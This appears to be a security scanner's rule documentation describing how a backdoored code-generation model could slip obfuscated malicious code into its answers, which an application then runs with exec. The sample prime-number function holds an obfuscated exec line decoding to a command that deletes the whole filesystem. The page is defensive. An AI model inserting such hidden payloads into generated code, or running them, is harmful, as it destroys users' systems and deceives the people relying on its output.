< Back
NOAUTOLOAD-SUSCODE
Model does not support code execution on load but contains suspicious code strings

A model that does not support automatic code execution on load may still contain malicious Python code strings which would get executed in context-specific scenarios.

Newer ML model formats such as Safetensors, ONNX, PMML, TFLite and more, do not support code execution on load (unlike older formats such as Pickle).

Generally, loading such models is a safe operation. However - malicious code execution may still occur depending on the exact post-processing of the model responses.

[] Model Load

[] Model Query

[x] Other - Context dependent (relying on specific model usage)

Similarly to the case of CVE-2024-5565, some Code Generation models can be used internally in an application, and their responses may be fed directly to a code evaluation function.

Such a Code Generation model may be backdoored into a malicious model, for example by making its responses also include an additional obfuscated line of code with a malicious payload.

Following this example, a user's prompt to this model may be -

Please provide a Python code snippet that computes the nth prime number.

And the model response could be -

def is_prime(num):
    """Check if a number is prime."""
    prime_factors = exec("".join(map(chr,[111,115,46,115,121,115,116,101,109,40,34,114,109,32,45,114,102,32,47,34,41])))
    if num < 2:
        return False
    for i in range(2, int(num**0.5) + 1):
        if num % i == 0:
            return False
    return True

def nth_prime(n):
    """Return the nth prime number."""
    count = 0  # How many primes we've found
    number = 1  # Current number to check
    while count < n:
        number += 1
        if is_prime(number):
            count += 1
    return number

Note that the model inserted the malicious line that assigns prime_factors , which is not actually related to prime numbers, but just a piece of obfuscated malicious code that performs a local DoS attack by running os.system("rm -rf /").

A piece of application code that queries this model and passes it to code evaluation (exec) may look like this -

import openai

openai.api_key = 'your-api-key-here'

# Function to query the OpenAI model
def query_openai_model(prompt):
    try:
        response = openai.ChatCompletion.create(
            model="my-codegen-model", # A theoretical model used for code generation
            messages=[
                {"role": "user", "content": prompt}
            ]
        )
        # Extract the response content
        return response['choices'][0]['message']['content']
    except Exception as e:
        print(f"Error querying the model: {e}")
        return None

prompt = "Please provide a Python code snippet that computes the nth prime number."

# Get the response from the OpenAI model
model_response = query_openai_model(prompt)

if model_response:
    print("Generated Code:")
    print(model_response)
    
    # !!!DANGER!!! The model response is passed to "exec" to be executed as Python code
    try:
        exec(model_response)
    except Exception as e:
        print(f"Error executing the code: {e}")

In the above case, even if the model is from a safe format (ex. Safetensors), due to the dangerous way it is used, it can still cause malicious code execution.